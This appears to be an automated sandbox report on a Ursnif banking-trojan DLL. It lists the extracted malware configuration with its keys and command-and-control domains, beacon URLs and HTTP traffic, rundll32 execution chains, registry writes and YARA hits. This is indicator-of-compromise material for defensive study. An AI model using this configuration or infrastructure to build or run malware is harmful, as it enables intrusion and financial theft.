{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq | Avira URL Cloud: Label: malware |
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo | Avira URL Cloud: Label: malware |
Source: 00000005.00000003.323666044.0000000002AB0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"} |
Source: SecuriteInfo.com..7135.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: SecuriteInfo.com..7135.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll |
Source: global traffic | HTTP traffic detected: GET /INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Jun 2021 20:50:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30 |
Source: {FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF80E1CCC67DA5CD93.TMP.23.dr | String found in binary or memory: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq |
Source: Yara match | File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY |
Source: loaddll32.exe, 00000000.00000002.460078435.000000000073B000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> | |
Source: Yara match | File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2485 NtQueryVirtualMemory, | 0_2_6E1C2485 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C1B9C GetProcAddress,NtCreateSection,memset, | 4_2_6E1C1B9C |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C1EC7 NtMapViewOfSection, | 4_2_6E1C1EC7 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2485 NtQueryVirtualMemory, | 4_2_6E1C2485 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2264 | 0_2_6E1C2264 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2237EA | 0_2_6E2237EA |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23F1F0 | 0_2_6E23F1F0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23D7C5 | 0_2_6E23D7C5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23DFD2 | 0_2_6E23DFD2 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E224510 | 0_2_6E224510 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E291D40 | 0_2_6E291D40 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E237200 | 0_2_6E237200 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E23A216 | 0_2_6E23A216 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E221010 | 0_2_6E221010 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2308E5 | 0_2_6E2308E5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E22A9D3 | 0_2_6E22A9D3 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2264 | 4_2_6E1C2264 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2237EA | 4_2_6E2237EA |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23F1F0 | 4_2_6E23F1F0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23D7C5 | 4_2_6E23D7C5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23DFD2 | 4_2_6E23DFD2 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E224510 | 4_2_6E224510 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E291D40 | 4_2_6E291D40 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E237200 | 4_2_6E237200 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E23A216 | 4_2_6E23A216 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E221010 | 4_2_6E221010 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2308E5 | 4_2_6E2308E5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E22A9D3 | 4_2_6E22A9D3 |
Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 6E220F70 appears 31 times | |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6E220F70 appears 31 times | |
Source: SecuriteInfo.com..7135.dll | Binary or memory string: OriginalFilenameSon.dll8 vs SecuriteInfo.com..7135.dll |
Source: SecuriteInfo.com..7135.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
Source: classification engine | Classification label: mal76.troj.winDLL@12/13@1/1 |
Source: SecuriteInfo.com..7135.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll' | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo | |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding | |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2 | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2 | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK |
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: SecuriteInfo.com..7135.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: SecuriteInfo.com..7135.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: | Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2200 push ecx; ret | 0_2_6E1C2209 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C2253 push ecx; ret | 0_2_6E1C2263 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E220FB5 push ecx; ret | 0_2_6E220FC8 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D0B16 pushad ; iretd | 0_2_6E1D0B17 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1CEBB5 pushfd ; iretd | 0_2_6E1CEC0C |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D2807 pushad ; retf | 0_2_6E1D2809 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1D10D4 push 04853024h; retf | 0_2_6E1D10DB |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2200 push ecx; ret | 4_2_6E1C2209 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1C2253 push ecx; ret | 4_2_6E1C2263 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E220FB5 push ecx; ret | 4_2_6E220FC8 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D0B16 pushad ; iretd | 4_2_6E1D0B17 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1CEBB5 pushfd ; iretd | 4_2_6E1CEC0C |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D2807 pushad ; retf | 4_2_6E1D2809 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E1D10D4 push 04853024h; retf | 4_2_6E1D10DB |
Source: Yara match | File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed |
Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer, | 0_2_6E238402 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer, | 0_2_6E238402 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E297188 mov eax, dword ptr fs:[00000030h] | 0_2_6E297188 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E2970BE mov eax, dword ptr fs:[00000030h] | 0_2_6E2970BE |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E296CC5 push dword ptr fs:[00000030h] | 0_2_6E296CC5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E297188 mov eax, dword ptr fs:[00000030h] | 4_2_6E297188 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E2970BE mov eax, dword ptr fs:[00000030h] | 4_2_6E2970BE |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E296CC5 push dword ptr fs:[00000030h] | 4_2_6E296CC5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E225EA1 SetUnhandledExceptionFilter, | 0_2_6E225EA1 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_6E225ED2 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E225EA1 SetUnhandledExceptionFilter, | 4_2_6E225EA1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 4_2_6E225ED2 |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Program Manager |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Progman |
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp | Binary or memory string: Progmanlock |
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, | 0_2_6E1C1E8A |
Source: C:\Windows\System32\loaddll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, | 0_2_6E22E72D |
Source: C:\Windows\System32\loaddll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 0_2_6E22E438 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 0_2_6E22E4B5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, | 0_2_6E22E538 |
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW, | 0_2_6E22ED13 |
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW, | 0_2_6E22ED99 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, | 0_2_6E22FA7E |
Source: C:\Windows\System32\loaddll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, | 0_2_6E223BC0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW, | 0_2_6E22E3DC |
Source: C:\Windows\System32\loaddll32.exe | Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, | 0_2_6E22E857 |
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen, | 0_2_6E22E904 |
Source: C:\Windows\System32\loaddll32.exe | Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, | 0_2_6E22E168 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, | 4_2_6E1C1E8A |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, | 4_2_6E22E72D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 4_2_6E22E438 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _GetPrimaryLen,EnumSystemLocalesW, | 4_2_6E22E4B5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, | 4_2_6E22E538 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, | 4_2_6E22ED13 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW, | 4_2_6E22ED99 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, | 4_2_6E22FA7E |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, | 4_2_6E223BC0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW, | 4_2_6E22E3DC |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, | 4_2_6E22E857 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen, | 4_2_6E22E904 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, | 4_2_6E22E168 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1C7D SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, | 0_2_6E1C1C7D |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E1C1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, | 0_2_6E1C1F10 |
Source: Yara match | File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY |
